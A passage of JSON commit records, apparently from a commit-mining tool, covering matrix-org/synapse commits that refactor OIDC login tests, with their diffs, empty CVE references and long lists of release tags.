"v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - }, - { - "commit_id": "0825299cfcf61079f78b7a6c5e31f5df078c291a", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608130193, - "hunks": 0, - "message": "Merge remote-tracking branch 'origin/release-v1.24.0' into bbz/info-mainline-1.24.0", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [], - "matched_rules": [] - }, - { - "commit_id": "2dd2e90e2b0b78f82d0e3372bacba9a84240302b", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608035996, - "hunks": 14, - "message": "Test `get_extra_attributes` fallback despite the warnings saying \"don't implement get_extra_attributes\", we had implemented it, so the tests weren't doing what we thought they were.", - "diff": [ - "diff --git a/tests/handlers/test_oidc.py b/tests/handlers/test_oidc.py", - "index 464e569ac..1794a169e 100644", - "--- a/tests/handlers/test_oidc.py", - "+++ b/tests/handlers/test_oidc.py", - "@@ -21,3 +21,3 @@ import pymacaroons", - "-from synapse.handlers.oidc_handler import OidcError, OidcMappingProvider", - "+from synapse.handlers.oidc_handler import OidcError", - " from synapse.handlers.sso import MappingException", - "@@ -57,3 +57,3 @@ COOKIE_PATH = \"/_synapse/oidc\"", - "-class TestMappingProvider(OidcMappingProvider):", - "+class TestMappingProvider:", - " @staticmethod", - "@@ -62,2 +62,5 @@ class TestMappingProvider(OidcMappingProvider):", - "+ def __init__(self, config):", - "+ pass", - "+", - " def get_remote_user_id(self, userinfo):", - "@@ -362,2 +365,9 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " \"\"\"", - "+", - "+ # ensure that we are correctly testing the fallback when \"get_extra_attributes\"", - "+ # is not implemented.", - "+ mapping_provider = self.handler._user_mapping_provider", - "+ with self.assertRaises(AttributeError):", - "+ _ = mapping_provider.get_extra_attributes", - "+", - " token = {", - "@@ -398,3 +408,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- expected_user_id, request, client_redirect_url, {},", - "+ expected_user_id, request, client_redirect_url, None,", - " )", - "@@ -429,3 +439,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- expected_user_id, request, client_redirect_url, {},", - "+ expected_user_id, request, client_redirect_url, None,", - " )", - "@@ -618,3 +628,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- \"@test_user:test\", ANY, ANY, {}", - "+ \"@test_user:test\", ANY, ANY, None,", - " )", - "@@ -629,3 +639,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- \"@test_user_2:test\", ANY, ANY, {}", - "+ \"@test_user_2:test\", ANY, ANY, None,", - " )", - "@@ -666,3 +676,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- user.to_string(), ANY, ANY, {},", - "+ user.to_string(), ANY, ANY, None,", - " )", - "@@ -673,3 +683,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- user.to_string(), ANY, ANY, {},", - "+ user.to_string(), ANY, ANY, None,", - " )", - "@@ -688,3 +698,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- user.to_string(), ANY, ANY, {},", - "+ user.to_string(), ANY, ANY, None,", - " )", - "@@ -724,3 +734,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- \"@TEST_USER_2:test\", ANY, ANY, {},", - "+ \"@TEST_USER_2:test\", ANY, ANY, None,", - " )", - "@@ -758,3 +768,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- \"@test_user1:test\", ANY, ANY, {},", - "+ \"@test_user1:test\", ANY, ANY, None,", - " )", - "diff --git a/tests/rest/client/v1/utils.py b/tests/rest/client/v1/utils.py", - "index 5a18af8d3..1b3166948 100644", - "--- a/tests/rest/client/v1/utils.py", - "+++ b/tests/rest/client/v1/utils.py", - "@@ -447,3 +447,3 @@ class RestHelper:", - "-# an 'oidc_config' suitable for login_with_oidc.", - "+# an 'oidc_config' suitable for login_via_oidc.", - " TEST_OIDC_CONFIG = {" - ], - "changed_files": [ - "tests/handlers/test_oidc.py", - "tests/rest/client/v1/utils.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - }, - { - "commit_id": "8388a7fb3a02e50cd2dded8f7e43235c42ac597b", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608037411, - "hunks": 15, - "message": "Make `_make_callback_with_userinfo` async ... so that we can test its behaviour when it raises. Also pull it out to the top level so that I can use it from other test classes.", - "diff": [ - "diff --git a/tests/handlers/test_oidc.py b/tests/handlers/test_oidc.py", - "index bd2437501..c54f1c579 100644", - "--- a/tests/handlers/test_oidc.py", - "+++ b/tests/handlers/test_oidc.py", - "@@ -23,2 +23,3 @@ from synapse.handlers.oidc_handler import OidcError", - " from synapse.handlers.sso import MappingException", - "+from synapse.server import HomeServer", - " from synapse.types import UserID", - "@@ -401,3 +402,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " )", - "- request = self._build_callback_request(", - "+ request = _build_callback_request(", - " code, state, session, user_agent=user_agent, ip_address=ip_address", - "@@ -609,3 +610,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " )", - "- request = self._build_callback_request(\"code\", state, session)", - "+ request = _build_callback_request(\"code\", state, session)", - "@@ -626,3 +627,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- self._make_callback_with_userinfo(userinfo)", - "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", - " auth_handler.complete_sso_login.assert_called_once_with(", - "@@ -637,3 +638,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- self._make_callback_with_userinfo(userinfo)", - "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", - " auth_handler.complete_sso_login.assert_called_once_with(", - "@@ -650,3 +651,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " userinfo = {\"sub\": \"test3\", \"username\": \"test_user_3\"}", - "- self._make_callback_with_userinfo(userinfo)", - "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", - " auth_handler.complete_sso_login.assert_not_called()", - "@@ -674,3 +675,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- self._make_callback_with_userinfo(userinfo)", - "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", - " auth_handler.complete_sso_login.assert_called_once_with(", - "@@ -681,3 +682,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " # Subsequent calls should map to the same mxid.", - "- self._make_callback_with_userinfo(userinfo)", - "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", - " auth_handler.complete_sso_login.assert_called_once_with(", - "@@ -696,3 +697,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- self._make_callback_with_userinfo(userinfo)", - "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", - " auth_handler.complete_sso_login.assert_called_once_with(", - "@@ -717,3 +718,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- self._make_callback_with_userinfo(userinfo)", - "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", - " auth_handler.complete_sso_login.assert_not_called()", - "@@ -732,3 +733,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - "- self._make_callback_with_userinfo(userinfo)", - "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", - " auth_handler.complete_sso_login.assert_called_once_with(", - "@@ -739,3 +740,5 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " \"\"\"If the mapping provider generates an invalid localpart it should be rejected.\"\"\"", - "- self._make_callback_with_userinfo({\"sub\": \"test2\", \"username\": \"f\u00c3\u00b6\u00c3\u00b6\"})", - "+ self.get_success(", - "+ _make_callback_with_userinfo(self.hs, {\"sub\": \"test2\", \"username\": \"f\u00c3\u00b6\u00c3\u00b6\"})", - "+ )", - " self.assertRenderedError(\"mapping_error\", \"localpart is invalid: f\u00c3\u00b6\u00c3\u00b6\")", - "@@ -764,3 +767,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- self._make_callback_with_userinfo(userinfo)", - "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", - "@@ -786,3 +789,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- self._make_callback_with_userinfo(userinfo)", - "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", - " auth_handler.complete_sso_login.assert_not_called()", - "@@ -792,60 +795,72 @@ class OidcHandlerTestCase(HomeserverTestCase):", - "- def _make_callback_with_userinfo(", - "- self, userinfo: dict, client_redirect_url: str = \"http://client/redirect\"", - "- ) -> None:", - "- self.handler._exchange_code = simple_async_mock(return_value={})", - "- self.handler._parse_id_token = simple_async_mock(return_value=userinfo)", - "- self.handler._fetch_userinfo = simple_async_mock(return_value=userinfo)", - "- state = \"state\"", - "- session = self.handler._generate_oidc_session_token(", - "- state=state,", - "- nonce=\"nonce\",", - "- client_redirect_url=client_redirect_url,", - "- ui_auth_session_id=None,", - "- )", - "- request = self._build_callback_request(\"code\", state, session)", - "+async def _make_callback_with_userinfo(", - "+ hs: HomeServer, userinfo: dict, client_redirect_url: str = \"http://client/redirect\"", - "+) -> None:", - "+ \"\"\"Mock up an OIDC callback with the given userinfo dict", - "- self.get_success(self.handler.handle_oidc_callback(request))", - "+ We'll pull out the OIDC handler from the homeserver, stub out a couple of methods,", - "+ and poke in the userinfo dict as if it were the response to an OIDC userinfo call.", - "- def _build_callback_request(", - "- self,", - "- code: str,", - "- state: str,", - "- session: str,", - "- user_agent: str = \"Browser\",", - "- ip_address: str = \"10.0.0.1\",", - "- ):", - "- \"\"\"Builds a fake SynapseRequest to mock the browser callback", - "-", - "- Returns a Mock object which looks like the SynapseRequest we get from a browser", - "- after SSO (before we return to the client)", - "-", - "- Args:", - "- code: the authorization code which would have been returned by the OIDC", - "- provider", - "- state: the \"state\" param which would have been passed around in the", - "- query param. Should be the same as was embedded in the session in", - "- _build_oidc_session.", - "- session: the \"session\" which would have been passed around in the cookie.", - "- user_agent: the user-agent to present", - "- ip_address: the IP address to pretend the request came from", - "- \"\"\"", - "- request = Mock(", - "- spec=[", - "- \"args\",", - "- \"getCookie\",", - "- \"addCookie\",", - "- \"requestHeaders\",", - "- \"getClientIP\",", - "- \"get_user_agent\",", - "- ]", - "- )", - "+ Args:", - "+ hs: the HomeServer impl to send the callback to.", - "+ userinfo: the OIDC userinfo dict", - "+ client_redirect_url: the URL to redirect to on success.", - "+ \"\"\"", - "+ handler = hs.get_oidc_handler()", - "+ handler._exchange_code = simple_async_mock(return_value={})", - "+ handler._parse_id_token = simple_async_mock(return_value=userinfo)", - "+ handler._fetch_userinfo = simple_async_mock(return_value=userinfo)", - "- request.getCookie.return_value = session", - "- request.args = {}", - "- request.args[b\"code\"] = [code.encode(\"utf-8\")]", - "- request.args[b\"state\"] = [state.encode(\"utf-8\")]", - "- request.getClientIP.return_value = ip_address", - "- request.get_user_agent.return_value = user_agent", - "- return request", - "+ state = \"state\"", - "+ session = handler._generate_oidc_session_token(", - "+ state=state,", - "+ nonce=\"nonce\",", - "+ client_redirect_url=client_redirect_url,", - "+ ui_auth_session_id=None,", - "+ )", - "+ request = _build_callback_request(\"code\", state, session)", - "+", - "+ await handler.handle_oidc_callback(request)", - "+", - "+", - "+def _build_callback_request(", - "+ code: str,", - "+ state: str,", - "+ session: str,", - "+ user_agent: str = \"Browser\",", - "+ ip_address: str = \"10.0.0.1\",", - "+):", - "+ \"\"\"Builds a fake SynapseRequest to mock the browser callback", - "+", - "+ Returns a Mock object which looks like the SynapseRequest we get from a browser", - "+ after SSO (before we return to the client)", - "+", - "+ Args:", - "+ code: the authorization code which would have been returned by the OIDC", - "+ provider", - "+ state: the \"state\" param which would have been passed around in the", - "+ query param. Should be the same as was embedded in the session in", - "+ _build_oidc_session.", - "+ session: the \"session\" which would have been passed around in the cookie.", - "+ user_agent: the user-agent to present", - "+ ip_address: the IP address to pretend the request came from", - "+ \"\"\"", - "+ request = Mock(", - "+ spec=[", - "+ \"args\",", - "+ \"getCookie\",", - "+ \"addCookie\",", - "+ \"requestHeaders\",", - "+ \"getClientIP\",", - "+ \"get_user_agent\",", - "+ ]", - "+ )", - "+", - "+ request.getCookie.return_value = session", - "+ request.args = {}", - "+ request.args[b\"code\"] = [code.encode(\"utf-8\")]", - "+ request.args[b\"state\"] = [state.encode(\"utf-8\")]", - "+ request.getClientIP.return_value = ip_address", - "+ request.get_user_agent.return_value = user_agent", - "+ return request" - ], - "changed_files": [ - "tests/handlers/test_oidc.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - }, - { - "commit_id": "c1883f042d4e6d69e4c211bcad5d65da5123f33d", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608073203, - "hunks": 1, - "message": "Remove spurious mocking of complete_sso_login The tests that need this all do it already.", - "diff": [ - "diff --git a/tests/handlers/test_oidc.py b/tests/handlers/test_oidc.py", - "index 1794a169e..bd2437501 100644", - "--- a/tests/handlers/test_oidc.py", - "+++ b/tests/handlers/test_oidc.py", - "@@ -798,4 +798,2 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " self.handler._fetch_userinfo = simple_async_mock(return_value=userinfo)", - "- auth_handler = self.hs.get_auth_handler()", - "- auth_handler.complete_sso_login = simple_async_mock()" - ], - "changed_files": [ - "tests/handlers/test_oidc.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - }, - { - "commit_id": "fd83debcc047efecfb936422684f2c283ecbfe8b", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607513408, - "hunks": 0, - "message": "Merge branch 'master' into develop", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - 